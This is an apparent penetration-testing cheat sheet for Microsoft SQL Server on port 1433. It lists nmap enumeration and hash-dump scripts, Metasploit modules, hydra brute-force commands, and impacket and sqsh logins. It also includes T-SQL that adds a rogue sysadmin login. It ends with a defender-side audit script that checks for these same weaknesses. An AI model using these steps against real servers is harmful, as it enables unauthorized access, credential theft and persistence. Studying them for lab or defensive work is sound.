# Ms-SQL 1433

**To search for related scripts, look for**

```
nmap --script-help "ms and sql"
```

**#Nmap**

```
#one liner
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.11.1.13

nmap --script ms-sql-info -p 1433 10.0.0.0
nmap --script ms-sql-config -p 1433 10.0.0.0
nmap --script ms-sql-empty-password,ms-sql-xp-cmdshell -p 1433 10.0.0.0
nmap --script ms-sql-* -p 1433 10.0.0.0 
```

**#Metasploit**

```
msfconsole
msf> use admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump
```

**#Bruteforcing**

```
# the flags are ASCII hyphens: -L/-l for user list/single user, -P/-p for password list/single password
hydra -L usernames.txt -p password 10.0.0.0 mssql
hydra -l username -P passwords.txt 10.0.0.0 mssql
```

**#Connect**

```
# impacket
impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip>
impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip> -windows-auth

# sqsh
sqsh -S <target-ip> -U username -P password
sqsh -S <target-ip> -U username -P password -D database
```

**#Commands**

```
# Get all users
> SELECT * FROM sys.database_principals

# Switch to the database
> USE <database>

# Get databases
> SELECT * FROM master.dbo.sysdatabases

# List tables
> SELECT * FROM information_schema.tables

# Get table content
> SELECT * FROM <database_name>.dbo.<table_name>

# Get the version of MSSQL
> SELECT @@version

# Check if the current user have permission to execute OS command
> USE master
> EXEC sp_helprotect 'xp_cmdshell'

# Get linked servers
> EXEC sp_linkedservers
> SELECT * FROM sys.servers

# Create a new user with sysadmin privilege
> CREATE LOGIN tester WITH PASSWORD = 'password'
> EXEC sp_addsrvrolemember 'tester', 'sysadmin'

# Get current username
> SELECT user_name()
```
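The checks above (empty password, xp_cmdshell, linked servers, sysadmin membership, failed logins from a hydra run) are what a defender audits from the other side. The following T-SQL audit script is an added example and is not part of the original notes; it assumes you are connected as a login holding CONTROL SERVER (needed to read `password_hash` from `sys.sql_logins`) and that the default `ERRORLOG` is in use. The remediation statements at the end are left commented so the script stays read-only.

```sql
-- Added defender-side audit for the findings the enumeration steps above would surface.
-- Assumes CONTROL SERVER on the instance (password_hash is NULL without it).

-- 1. Dangerous server options: anything reporting value_in_use = 1 widens OS/network reach.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures',
               'Ad Hoc Distributed Queries', 'clr enabled')
ORDER BY name;

-- 2. Who is sysadmin? Compare create_date/modify_date against your change records;
--    a fresh 'tester'-style login here is the artefact the CREATE LOGIN step above leaves.
SELECT m.name AS member_name, m.type_desc, m.is_disabled,
       m.create_date, m.modify_date
FROM sys.server_role_members rm
JOIN sys.server_principals r ON rm.role_principal_id = r.principal_id
JOIN sys.server_principals m ON rm.member_principal_id = m.principal_id
WHERE r.name = 'sysadmin'
ORDER BY m.modify_date DESC;

-- 3. State of the built-in sa login (sid 0x01) and its policy flags.
SELECT name, is_disabled, is_policy_checked, is_expiration_checked
FROM sys.sql_logins
WHERE sid = 0x01;

-- 4. SQL logins with an empty password or a password equal to the login name
--    (the same condition ms-sql-empty-password / a wordlist run would hit).
SELECT name,
       CASE WHEN PWDCOMPARE('',   password_hash) = 1 THEN 'EMPTY'
            WHEN PWDCOMPARE(name, password_hash) = 1 THEN 'EQUALS_NAME'
       END AS weakness
FROM sys.sql_logins
WHERE is_disabled = 0
  AND (PWDCOMPARE('', password_hash) = 1 OR PWDCOMPARE(name, password_hash) = 1);

-- 5. Linked servers and how credentials are mapped; uses_self_credential = 0 with a
--    fixed remote_name means every local user reaches the remote side as that account.
SELECT s.name, s.product, s.provider, s.data_source,
       ll.uses_self_credential, ll.remote_name
FROM sys.servers s
JOIN sys.linked_logins ll ON s.server_id = ll.server_id
WHERE s.is_linked = 1;

-- 6. Failed logins in the current error log (log 0, type 1 = SQL Server log).
--    A burst of 'Login failed for user' lines from one [CLIENT: ip] is the hydra signature.
EXEC xp_readerrorlog 0, 1, N'Login failed';

-- Remediation (commented; run deliberately, not as part of the audit):
-- EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
-- EXEC sp_configure 'xp_cmdshell', 0;            RECONFIGURE;
-- ALTER LOGIN sa DISABLE;
```

Run it per instance from a scheduled job or a CI check and diff the result sets against a known-good baseline; sections 2, 4 and 6 are the ones whose output should normally be empty or unchanged between runs.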
